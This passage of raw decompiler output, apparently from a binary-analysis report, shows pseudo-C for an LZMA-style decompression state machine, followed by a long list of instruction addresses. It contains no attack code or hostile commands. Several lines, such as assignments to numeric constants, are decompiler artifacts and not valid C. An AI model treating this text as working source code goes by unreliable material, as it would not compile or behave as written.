												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                    0x00407194
                                                    0x00407194
                                                    0x00407194
                                                    0x00407194
                                                    0x0040719a
                                                    0x0040719e
                                                    0x004071a2
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x00000000
                                                    0x00000000
                                                    0x004074cd
                                                    0x004074d6
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x00407524
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407526
                                                    0x00407526
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x004075db
                                                    0x004075e5
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x004075fd
                                                    0x00407601
                                                    0x00407601
                                                    0x004074a9
                                                    0x004074af
                                                    0x004074b6
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x00000000
                                                    0x004074c1
                                                    0x0040752b
                                                    0x00407538
                                                    0x0040753b
                                                    0x00407447
                                                    0x00407447
                                                    0x00407447
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bf9
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c03
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c5e
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406ca8
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd2
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d18
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x004075cf
                                                    0x00000000
                                                    0x004075cf
                                                    0x00407426
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00407441
                                                    0x00407441
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x00000000
                                                    0x00406dec
                                                    0x00406d66
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x00000000
                                                    0x00000000
                                                    0x00407068
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x00000000
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
